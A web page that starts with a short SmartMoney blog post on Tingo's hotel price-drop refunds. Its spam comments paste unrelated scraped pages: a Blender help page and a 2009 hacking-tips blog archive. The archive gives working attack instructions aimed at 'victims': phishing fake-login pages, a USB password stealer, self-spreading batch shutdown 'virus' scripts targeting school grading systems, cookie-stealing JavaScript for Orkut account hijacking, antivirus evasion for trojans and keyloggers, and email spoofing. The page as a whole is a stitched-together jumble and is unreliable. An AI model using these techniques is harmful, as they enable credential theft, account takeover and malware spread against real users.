.

SmartMoney Blogs

Real-Time Advice
Our real-time advice on how market shifts and news impact you and your money

The Newest Travel Price Protections

Travelers may now have more recourse to ensure they’re getting the best possible price on some hotel bookings.

Tingo, a new site launched today, automatically rebooks rooms if the rate drops — and refunds the customer the difference in price. As we previously reported, more travel booking sites, airlines and even credit card issuers are touting such best-price guarantees. Experts say most of those policies have serious fine print, however, covering only price drops within 24 hours of booking, or only those where another customer has booked the exact same trip.

Tingo, which uses inventory from Expedia, claims to have broader coverage. “There are fewer hoops to jump through,” says George Hobica, the site’s “travel watchdog,” and chief executive of AirfareWatchdog.com. Tingo automatically tracks nightly room rates and offers refunds from the time of booking until the room becomes nonrefundable, usually 24 hours in advance of check-in per most hotels’ policies. There’s no limit to the number of refunds someone might receive, says Hobica.

But booking may still be a gamble. Refundable hotel rates are typically higher than hotels’ non-refundable ones, and Tingo’s policy doesn’t cover sales that don’t show up in its systems — such as AAA rates, offers on daily deal sites or those that require a code to book. As with airfare, price-protection might not do much given that rates are rising. Occupancy is high enough now that hotels have more price leverage, and rates are expected to increase 4.1% this year as a result, says Robert Mandelbaum, director of research information services for PKF Hospitality Research. Hobica says roughly a third of bookings thus far resulted in a price adjustment. “Prices absolutely do drop, sometimes dramatically,” he says.

Travelers looking for their best prices, price adjustment or no, may have better luck at midscale and economy properties such as Quality Inn, Ramada and Red Roof, says Mandelbaum. Luxury properties have seen some of the fastest recovery, with prices expected to increase 5.2% this year. Midscale hotels, meanwhile, might see rate increases of just 1.3%. “There are definitely opportunities out there,” he says.

Comments

We welcome thoughtful comments from readers. Please comply with our guidelines. Our blogs do not require the use of your real name.

Comments (2 of 2)

View all Comments »
    • By WebOsPublisher

      Blender is the open source,cross platform suite of tools for 3D creation.
      blender.org – Preview Icons
      Preview Icons
      Credits•Documentation•Report a Bug•Submit a Patch•Release Logs•Building Blender•Current Projects•Architecture
      Blender 2.64•Blender 2.63•Blender 2.62•Blender 2.61•Blender 2.60•Blender 2.59•Blender 2.58•Blender 2.57•Blender 2.56 beta•Blender 2.55 beta•Blender 2.49
      The Blender User Interface is enhanced by showing small icons in the popup menu for materials, textures, lamps and world as well as in the popup menus for images. This adds a visual clue for the user in addition to the name of the material or texture that is shown in the menu. The icons also update themselves whenever a change is made to a material or a texture for example.
      For images, the preview icon is stored in the .blend file to prevent having to load all images into memory just to show the previews for the images. This means that the previews only have to be created once, when the popup for images is opened for the first time for any .blend file. When reopening the .blend file, the icons are created from the stored preview image without loading the actual image file into blender, which results in a significant speedup.
      The images are not shown in the icon preview for textures until the image has actually been loaded into Blender, for example when the larger preview for that texture is shown. The reason for this is, that it can takes a some time (and uses memory) to load the images, which would make the popup menu lag. It is planned to store all icon previews in the .blend file in the future, which will make it possible to show the texture image preview icons without having to load the possibly large image file.
      Future work
      For a next release, we will also allow image-based browsing when using the ‘Data browser’ (SHIFT+F4), appending from other files, and for image previews for browsing regular files.
      blender.orgFoundationInstitutePressLogo UsageContactFeatures & GalleryGalleryDownloadGet BlenderSource CodeExtrasTutorials & HelpTutorialsUser ManualPython ScriptingSupport ForumsCommunityGet InvolvedUser CommunityProfessional ServicesBlender ConferenceDevelopmentReport a BugCurrent ProjectsBlender StoreBooksDVDs and TrainingBe cool!

    • By WebOsPublisher

      October 2009 | Latest Windows Hacking Tips $ Tricks | GeekPosts.NET
      .post-footerdisplay:none !important;
      img.spimgborder:0px;padding:0px !important; margin-right:10px;clear:left !important;float: left;
      if (window.jstiming) window.jstiming.load.tick(‘headEnd’);
      (function()
      var e = document.createElement(‘script’);
      e.src = document.location.protocol + ‘//connect.facebook.net/en_US/all.js#xfbml=1′;
      e.async = true;
      document.getElementById(‘fb-root’).appendChild(e);
      ());
      HOME
      PRIVACY POLICY
      Blogger
      Gadgets
      Hacking
      How to
      News
      Software
      WordPress
      Latest Posts
      gapi.load(“iframes-styles-bubble”, function()
      if (window.iframes && iframes.open)
      iframes.open(
      ‘//blogger.com/navbar.g?targetBlogID756641693640613879327\46blogName\75Latest+Windows+Hacking+Tips+%26+Tricks+…\46publishMode\75PUBLISH_MODE_HOSTED\46navbarType\75LIGHT\46layoutType\75LAYOUTS\46searchRoot\75geekposts.net/search\46blogLocale\75en\46v752\46homepageUrl\75geekposts.net/\46vt755485644748849223445′,

      container: “navbar-iframe-container”,
      id: “navbar-iframe”
      ,

      );

      );
      Home » Archives for October 2009
      Monday, October 26, 2009
      How to display a message on your computer before Windows XP loads
      Posted by
      Admin
      Labels:
      How to,
      Windows Tricks
      1 comments
      how to display a message on your computer before Windows XP loads
      1. Go to Start->Run.
      2. On the Run window type regedit and press Enter.
      2.Navigate to the key HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\Windows NT\CurrentVersion\Winlogon.
      3.Modify the key legalnoticecaption and write the name of the window you want to appear.
      4.Modify the key legalnoticetext with what you want the window to say.
      5.Restart your computer. ..!!..;s
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Sunday, October 25, 2009
      Restart your friend’s phone using sms
      Posted by
      Admin
      Labels:
      Learn Hacking
      1 comments
      Here is a new trick to restart ur friends mobile via sms
      with this trick only 1110,1110i,1112,1100,2100 can be restarted.
      just type
      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
      ,,
      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
      or 79 inverted commas
      in text msg and send it to ur friend having cells mention above and see wat happens.
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Saturday, October 24, 2009
      Cloning Hard Drives | Hard Disk Cloning | Hard Disk Copying
      Posted by
      Admin
      Labels:
      Learn Hacking
      0
      comments
      Did know that you could clone your current Hard Drive without having to by extra software? Maybe you didn’t know that all that you needed, was already set up on your current system? Well, it is… and if you follow this tut, you shouldn’t have much of a problem.
      Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.
      First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.
      Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag.
      Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the “Full” button.
      Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says “Autofix Errors”.
      Fifth: In this final part, you might want to cut-and-paste to code in, unless you are sure that you can do it without making any mistakes:
      Click on the “Start” button, then click on the “Run…” button, then place the following into the Runbox:
      “XCOPY C:\*.*D:\ /c/h/e/k/r” (minus the quotes, of course) then press the “Enter” button.
      If you receive an error message, then remove the space from between XCOPY and C:\
      Anything that should happen to come up in the DOS box, just click “Y” for “Yes”. When its all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out.
      This tut has worked and has been tested on all systems except for Windows 2000, so you really shouldn’t have any problems. If, by any chance, you should come across a snag, message me and I’ll walk you through it.
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Thursday, October 22, 2009
      USB Password Stealer | Password Stealer
      Posted by
      Admin
      Labels:
      Learn Hacking,
      Software
      0
      comments
      Tweaked USB that steals every passwords including licences.
      Instructions:
      1.Decompress the archive and put all the files located in the folder “USBThief”into a USB.
      2.Insert the USB in your victim’s computer.
      3.View folder “dump” to see the passwords.
      DOWNLOAD
      Password: dl4all.com
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Tuesday, October 20, 2009
      Protect yourself from fake login pages
      Posted by
      Admin
      Labels:
      Learn Hacking
      0
      comments
      Using fake login pages is the easiest way to hack passwords. Identifying a fake login page is very easy but many people neglect to do some small checks before entering the login details and fall in the trap. I have seen a person paying 500$ for a fake login page of paypal. This proves that there are still people falling in this trap. This is just an example, there are many fake websites of banks, yahoomail, gmail,orkut,myspace etc …
      This post is an attempt to show what a hacker does to hack your password using fake login pages and how to protect yourself from those fake logins.I will try to keep this post as simple as possible, there may be some technical details which you can safely skip.
      Warning: I strongly advice you not to try this on anyone it may spoil your relation with the person on whom you are trying it and you may even end up behind the bars.
      What goes on behind when you enter your login details in login form??
      When you enter your login details in any login form and hit enter they are submitted to another page which reads these login details and checks the database if you entered the correct username and password, if yes then you will be taken to your account else you will get an error page.
      What an hacker does??
      A hacker creates a fake page which looks exactly same as the original page and some how tricks you to enter your login details in that page. These login details are then submitted to a file.At this stage the hacker has two optionsHe can either store the login details on his server or he can directly get them mailed to his email id. All the above said things happen behind the scenes, you will have no clue of it. When you enter you login details for the first time your details are submitted to the hacker and you will be directed to a error page ( this is the original error page). When you enter ur login details again you will be logged in to your account. It’s quite common for us to enter the login details wrongly sometimes so you will not become suspicious when you get the error page.
      How to identify fake login page traps ??
      1. Never enter you login details in unknown sites.
      2. Always type the address directly in to the browser.
      3. Do not follows the links you get in mails and chatting even if they are from your friends
      4. Always have a keen look in the address bar and verify if the address is correct. Check the screen shot below. Some people buy doamins which look simliar to the original site example: 0rkut for orkut, pay-pal for paypal,yahooo for yahoo. Some times you may over look these small differences and fall in trap.
      5. Please do report to the hosting site or the original site owner when you find a fake login page.
      6. If you feel like you entered your details in a fake login page change your password immediatley.
      Now let’s go on with the trick…
      You have to upload the fake login page on some server with php support. There are many free web hosting services available on the net, first sign up for anyone of them.Google for some free webhosting services,you will find many. Upload the files in the zipped folder on to your server and give the link of the fake login page to the person whose password you want to know. When the person enters his email id and password in to the fake login page they will be stored in a HTML file named “passwd.htm” on your server in the same directory where you uploaded the login page. Check that text file to get the passwords you wanted..
      Here is the demo of the trick
      Note:Don’t enter your actual password
      click this link to view the fake login page of yahoo
      The password you entered is saved into this page.
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Monday, October 19, 2009
      Create Folders And Files With NO! Name
      Posted by
      Admin
      Labels:
      Learn Hacking
      0
      comments
      This trick will allow you to create files and folders without any name.
      Just follow the following steps:
      1.Select any file or folder.
      2.Right click on it, press rename or simply press F2.
      3.Press and hold the alt key. While holding the Alt key, type numbers 0160 from the numpad.
      Note: Type the numbers 0160 from the numpad, that is, the numbers present on the right side of the keyboard. Don’t type the numbers which are present on top of the character keys.
      4.Press Enter and the nameless file or folder will be created.
      Reason: The file or folder that seems nameless is actually named with a single space.
      But what if you want to create another nameless file or folder in the same directory ?
      For this you will have to rename the file with 2 spaces. Just follow these steps below:
      1.Select file, press F2.
      2.Hold alt key and type 0160 from the numpad.
      3.Release the alt key. Now without doing anything else, again hold alt key and press 0160.
      4.Press enter and you will have second nameless file in the same directory.
      5.Repeat step 3 to create as many nameless files or folders in the same directory.
      (we’ve had a problem with deleting these folders, to do so, start your computer in safe mode and delete it from there.)
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Sunday, October 18, 2009
      Shut Down Your School | Hack your school system
      Posted by
      Admin
      Labels:
      Learn Hacking,
      Software
      0
      comments
      By using the following command you can shutdown your school or college by using only Note pad.This is the main command that will be launched upon startup.
      Type this in Notepad.
      @echo offshutdown.exe -s -t 10 -c
      “You have been hacked!”
      Save this as shutdown.bat, making sure you choose all files as the filetype.
      Step 2
      Make it run on StartupThe file you need can be downloaded here:This is just a simple registry file that anyone can create, but I don’t feel like explaining the registry to everyone. It will disguise itself by claiming to be an update for STI.
      mutantsrus.com/Update.reg
      Step 3
      Set up the replication systemHere is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.
      Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti
      Here is the code:
      @echo offcd C:\move ?:\$\!.exeren C:?.exe real.exeren C:virus.exe !.execd ?:\$move C:\!.exemove C:\shutdown.batmove C:\Update.regexit
      Save this as global.bat
      Step 4
      They grow up so fast — real fast!This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user’s hard drive and remain there.
      @echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?:\$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?:\$start real.exeexit
      Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.
      Step 5
      The CureThis is a little tool that can fix all damage done by your virus, it works in the same way that the virus works, but works to correct the problem rather than create it.
      @echo off
      shutdown -acd C:\WINDOWSdel shutdown.bat
      Save as cure.bat
      @echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWS
      Now download this file: mutantsrus.com/cure.exe
      Step 6
      The SetupNo it’s not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to “tools”, then select “convert archive to SFX”. Click “Advanced SFX Options” In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.)
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Saturday, October 17, 2009
      Hide Your Files In a JPEG | Lock Files in JPEG Format
      Posted by
      Admin
      Labels:
      Learn Hacking
      0
      comments
      Well, did you know you could hide your files in a JPEG file? For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed.
      Ok, lets begin…
      1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden – RECOMMENDED).
      2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden).
      3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden.
      4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.
      5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) – Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both. :D
      6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Friday, October 16, 2009
      Page hits flooder | Automatic Free page Hits
      Posted by
      Admin
      Labels:
      Learn Hacking
      0
      comments
      This small program can flood ur page hits.
      but you have to dedicate one browser for it.. like internet explorer
      method:
      make a batch file with these lines
      @echo off
      :1
      start C:\Progra~1\Intern~1\iexplore.exe “yoursite.com“
      ping -n 10 127.0.0.1 >nul
      taskkill.exe /im iexplore.exe
      goto 1
      depending upon your net speed u may increase the 10 secs time wait
      with 10 sec time u may have 360 hits in an hour
      with 5 sec time u may have 720 hits in an hour
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Wednesday, October 14, 2009
      How to setup multiple home pages in Firefox and IE | Multiple Home Pages
      Posted by
      Admin
      Labels:
      How to,
      Learn Hacking
      0
      comments
      I love browsing the Internet! In fact, I love it so much that when I start my browser, I need multiple pages to load up instead of just one! Of course, I could use a start page like Only2Clicks or Speed Dial, which allows me to access my favorites sites by simply clicking on them, but it’s not the same as having multiple home pages.
      So how do you get multiple pages to load into individual tabs each time you open up Firefox and IE? It’s actually pretty simple and I’m sure you’ll love it! Now I would suggest you not go overboard like I just did and setup 10 different home pages because Firefox will eat up all of our memory very quickly!
      How to setup multiple home pages in Firefox
      First off, go to Tools, and then Options from the top menu. Click on the Main or General tab. firefox main tab
      Now there are two ways you can setup multiple home pages in Firefox, an easy way and a more manual way. The manual way is to simply type bother URLs into the Home Page text box and separate them with the “|” or pipe symbol. The pipe symbol is usually above the Enter key on the keyboard.
      So if I wanted to have Google.com and Yahoo.com both set as startup home pages, I would type in the following:
      google.com|yahoo.com
      So your screen should look like this with the multiple URLs in the Home Page box:
      firefox startup
      And that’s it! Now when you open a new instance of Firefox, both of the tabs will appear! Sweet! Now there’s also an easier method of doing the same thing and that is to Use Bookmark.
      Basically, if you have a folder of bookmarks in Firefox and you want to set all of them as your startup home pages, just click the Use Bookmark button and select the entire folder.
      use bookmark
      Whichever bookmarks you have stored in that folder will automatically be placed into the Home Page text box separated by the pipe symbol. So you can use either method to get multiple start pages in Firefox!
      How to setup multiple home pages in IE
      Adding more than one site to your start up home pages in IE is also super easy! Basically, go to the site you want to add and then click on the down arrow next to the Home Page icon in IE that’s to the right hand side:
      add or change homepage
      When you click on that, you’ll get the option to change your current home page to the new page or to simply add this webpage to your home page tabs.
      add to home page tabs
      Obviously, choose the second option and now you’ll get multiple tabs appear when you start up Internet Explorer also!
      Remember to be judicious with this feature as it can be very annoying since every time you click on the Home Page button, all of the sites you specified will open up in different tabs! I would suggest a maximum of 3, with 2 probably being the best. Enjoy
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Tuesday, October 13, 2009
      How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other
      Posted by
      Admin
      Labels:
      How to,
      Internet,
      Learn Hacking
      0
      comments
      This is an easier version from the “How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other”
      This goes into more detail on how to create a fake page to login, and get redirected while it is sending a email of the password and username to your inbox. If you found this easy, then try out the post, “How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other”
      Fake login page is a fake page which you can use to hack others username and password. Fake login page looks exactly like the original page and if someone login in your page using his original username and password, the username and password will be mailed to you
      The process of Hacking anyone’s id using fake login pages is known as Phishing
      Now let’s learn how to create your very own fake login page.
      1 Open jotform.com and Sign Up.
      2 then Login there with your newly registered account.
      3 now click on ‘ Create your first form’.
      4 Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)
      5 Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)
      6 Now Click on ‘Power Tool’ Option (In right hand side…)
      7 Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’
      8 Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.
      9 You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.
      10 Now in Thank You URL you must put some link, like google.com or anything. Actually after entering username $ password, user will get redirect to this url.(Don’t leave it blank…)
      11 Now Click on ‘Save’. After saving, click on ‘Source’ Option.
      12 Now you can see two Options, namely ‘Option1′ $ ‘Option2′. Copy the full code of ‘Option2′.
      13 Now open Notepad text editor and write the following code their.
      Paste the Option2 code here
      14 And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it.
      Now you can view it by typing the url in the address bar.
      NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on 110mb.com and there are many other sites which you can find on the internet very easily.
      I suppose that you created your account at 110mb.com
      now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.
      Now you can access you file on the net by just typing the url of the file.
      And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form.
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Monday, October 12, 2009
      Create your own f@ke login page!!! | Create your own fake Page
      Posted by
      Admin
      Labels:
      Internet,
      Learn Hacking
      0
      comments
      This is an easier version from the “How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other”
      This goes into more detail on how to create a fake page to login, and get redirected while it is sending a email of the password and username to your inbox. If you found this easy, then try out the post, “How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other”
      Fake login page is a fake page which you can use to hack others username and password. Fake login page looks exactly like the original page and if someone login in your page using his original username and password, the username and password will be mailed to you
      The process of Hacking anyone’s id using fake login pages is known as Phishing
      Now let’s learn how to create your very own fake login page.
      1 Open jotform.com and Sign Up.
      2 then Login there with your newly registered account.
      3 now click on ‘ Create your first form’.
      4 Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)
      5 Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)
      6 Now Click on ‘Power Tool’ Option (In right hand side…)
      7 Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’
      8 Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.
      9 You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.
      10 Now in Thank You URL you must put some link, like google.com or anything. Actually after entering username $ password, user will get redirect to this url.(Don’t leave it blank…)
      11 Now Click on ‘Save’. After saving, click on ‘Source’ Option.
      12 Now you can see two Options, namely ‘Option1′ $ ‘Option2′. Copy the full code of ‘Option2′.
      13 Now open Notepad text editor and write the following code their.
      Paste the Option2 code here
      14 And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it.
      Now you can view it by typing the url in the address bar.
      NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on 110mb.com and there are many other sites which you can find on the internet very easily.
      I suppose that you created your account at 110mb.com
      now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.
      Now you can access you file on the net by just typing the url ofthe file.
      And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form.
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Spoofing Via Telnet | Telnet Hacking
      Posted by
      Admin
      Labels:
      Internet,
      Learn Hacking
      0
      comments
      Get a smtp server ( i use mx1.hotmail.com)
      they’re normally likemx1,mx2 etc..thehost.com.
      Now, go to Start>Run>cmd then in the cmd window,
      Type telnet mx1.hotmail.com 25
      then HELO hotmail.com then MAIL FROM : (fake email here)
      then RCPT TO: (person)then DATA then type your message,
      you can press enter for a new line, finish the message by a full stop (.) on a new line, press enter!
      spoofed.
      For Educational purpose only
      Didn’t it work? Go deadfake.com
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Saturday, October 10, 2009
      Find IP address info using Gmail/Yahoo/Hotmail
      Posted by
      Admin
      Labels:
      Internet,
      Learn Hacking
      0
      comments
      When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.
      First of all, the IP address is generally found in the headers enclosed between square brackets, for instance, [129.130.1.1]
      Finding IP address in Gmail
      1. Log into your Gmail account with your username and password.
      2. Open the mail.
      3. To display the email headers,
      * Click on the inverted triangle beside Reply. Select Show Orginal.4. manually find the IP address, proceed to 5.
      5. Look for Received: from followed by the IP address between square brackets [ ].
      Received: from [69.138.30.1] by web4587.mail.***.yahoo.com6. If you find more than one Received: from patterns, select the last one.
      7. Track the IP address of the sender
      Finding IP address in Yahoo! Mail
      1. Log into your Yahoo! mail with your username and password.2. Click on Inbox or whichever folder you have stored your mail.3. Open the mail.4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
      * Click on Options on the top-right corner
      * In the Mail Options page, click on General Preferences
      * Scroll down to Messages where you have the Headers option
      * Make sure that Show all headers on incoming messages is selected
      * Click on the Save button
      * Go back to the mails and open that mail5. You should see similar headers like aboveOr if you want to manually find the IP address, proceed to 6.6. Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.
      That is be the IP address of the sender.
      If there are many instances of Received: from with the IP address, select the IP address in the last pattern. If there are no instances of Received: from with the IP address, select the first IP address in X-Originating-IP.7. Track the IP address of the sender
      Finding IP address in Hotmail:
      1. Log into your Hotmail account with your username and password.2. Click on the Mail tab on the top.3. Open the mail.4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
      * Click on Options on the top-right corner
      * In the Mail Options page, click on Mail Display Settings
      * In Message Headers, make sure Advanced option is checked
      * Click on Ok button
      * Go back to the mails and open that mail5. You should see the email headers now.6. manually find the IP address, proceed to 7.
      7. If you find a header with X-Originating-IP: followed by an IP address, that is the sender’s IP address
      Hotmail headers In this case the IP address of the sender is [68.34.60.59].
      8. If you find a header with Received: from followed by a Gmail proxy like this Hotmail headers
      Look for Received: from followed by IP address within square brackets[
      In this case, the IP address of the sender is [69.140.7.58].9. Or else if you have headers like this
      Hotmail headers Look for Received: from followed by IP address within square brackets[].
      In this case, the IP address of the sender is [61.83.145.129] (Spam mail).10. If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.11. Track the IP address of the sender
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Friday, October 9, 2009
      Fastest Way To Hack into Someones System | Easy Hacking to System
      Posted by
      Admin
      Labels:
      Learn Hacking
      0
      comments
      Well as I already mentioned you can hack any system as it is conected to what we call “INTERNET”. To connect internet a system allocates a port for communication and Data Transfer. So we got to do is to get into that port that is to be hacked.
      Steps: -
      1. Software PORT SCANNER from google.
      2. The IP address of the victim whose port is open.
      3. NETLAB which gives u all information includes victim IP address,Area from where he is accessing internet….
      4. The IP of victim u found initially into NETLAB .
      5. Thats it now you can access his system.
      Note : This is really Hardcore Hacking and you should be very much careful while doing all this and you do all this on your own responsibility. This site is never responsible for anything you after reading any article from this site and there are almost 50-50 chances that you may get caught so don’t try this unless you are aware of everthing. Yes you can freak some of your friends by telling them that you can hack their systems very easily.
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Thursday, October 8, 2009
      Hack Orkut Accounts | Orkut Hack
      Posted by
      Admin
      Labels:
      Internet,
      Learn Hacking
      0
      comments
      First get firefox and the cookie editor plugin for it…u will need them…
      Then make two fake accounts…u will ned one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised…the choice is yours though..
      javascript:nobody=replyForm;nobody.toUserId.value=62915936;
      nobody.scrapText.value=eval
      (String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
      111,111,107,105,101)); nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;
      nobody.submit()
      U see the 62915936 part? Thats the one u need to edit to get the cookie to your account…..
      Now here is the script Code:
      HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE STEPS:
      1) Go to YOUR ALBUM section.
      2) Go to ANY photo and right click on it , see the properties of your display image…u will see something like 12345678.jpg
      3) There will be a eight digit value.
      4) Now put that value in the above javascript.
      5) Thats it.
      Now your javascript will look like:
      javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
      nobody.scrapText.value=eval
      (String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
      111,111,107,105,101));
      nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;
      nobody.submit()
      Now give this script to the victim , ask him to go to his scrap book and paste this script in his address bar and press enter. now you ll get his cookies in your scrapbook.
      Now after getting a cookie…
      1) Go to your home page
      2) Open the cookie editor plugin(TOOLS–>COOKIE EDITOR).
      3) Type orkut in the text box and click filter/refresh.look for orkut_state cookie.
      4) Just double click it and replace the orkut_state part with your victims. No need to change the _umbz _umbc part…
      5) THATS IT!!
      ANOTHER SCRIPT : (100%working)
      javascript:nobody=replyForm;nobody.toUserId.value=53093255;
      nobody.scrapText.value=document.cookie;nobody.
      action=’scrapbook.aspx?Action.submit’;nobody.submit()
      Put ur eight digit number in the place of (53093255)
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Wednesday, October 7, 2009
      How to make all Trojan/Virus/Keylogger UNDETECTABLE
      Posted by
      Admin
      Labels:
      How to,
      Learn Hacking,
      Software
      0
      comments
      This tutorial tells you how to make a Trojan, Virus, Keylogger, or anything that would be found harmful, NOT. This tutorial explains how to make all files look %100 clean (become clean and be %100 UNDETECTABLE from ALL ANTIVIRUSES!!!!! ALL!!!!!)Ready? GO!
      First, get your trojan, virus or keylogger, or server or w/e you plan on using to become undetectable, and get it ready. Fix it up, create it, whatever.
      My personal favoritekeylogger: Ardamax KeyloggerRemote Administration Tool (Must not have a router): Poisin IvyGoogle is your friend.
      Now that you have your trojan, virus or keylogger or w/e harmful ready, its time to make it UNDETECED!
      1. Download Software Passport (Armadillo) by Silicon Realms. This is THE best binder out there I know of, it makes everything %100 UNDETECTABLE BY ALL ANTIVIRUSES (including Norton, Kaspersky, Avast, etc)… The direct link to dl the program is here:Code:nct.digitalriver.com/fulfill/0161.001
      There is a form to fill out information, so put in your real email address, and then you’ll recieve a download link in your email (it might be in Spam, Junk mail section so beware.) 2. Once you download the program, install it.3. Once installed, you open it up and see this:This is the program. Now that you have it open, you might be confused on what the hell to do, right? Well, this is what you do!
      1. Download this pre-made settings. These settings are pre-made by me so you won’t be confused. Everything is working.
      DOWNLOAD THIS FOR THE PRE-MADE SETTINGS:Code:rapidshare.com/files/8749860/projects.arm.html
      DOWNLOAD THIS FOR THE BACKUP (You need this in the same location as the projects.arm file) YOU NEED THIS FILE ALSO!Code:rapidshare.com/files/8750048/projects.Stats.html
      Now, when you download these files, and you put them in the SAME FOLDER (or same location), open Software Passport again and click Load Existing Project (top left).
      Where it says “Files to Protect” (if theres stuff there, delete it):Add the files you want to make %100 UNDETECTABLE!!
      Now, once done, go to the bottom right and click “Build Project”. A bunch of windows will come up, just click Yes and OK.
      Now, once its created, they are %100 undetectable. Go toCode:virustotal.comto scan it with every Antivirus, and they wont find ANYTHING!It takes a long time to learn simplicity.
      Email ThisBlogThis!Share to TwitterShare to Facebook
      Tuesday, October 6, 2009
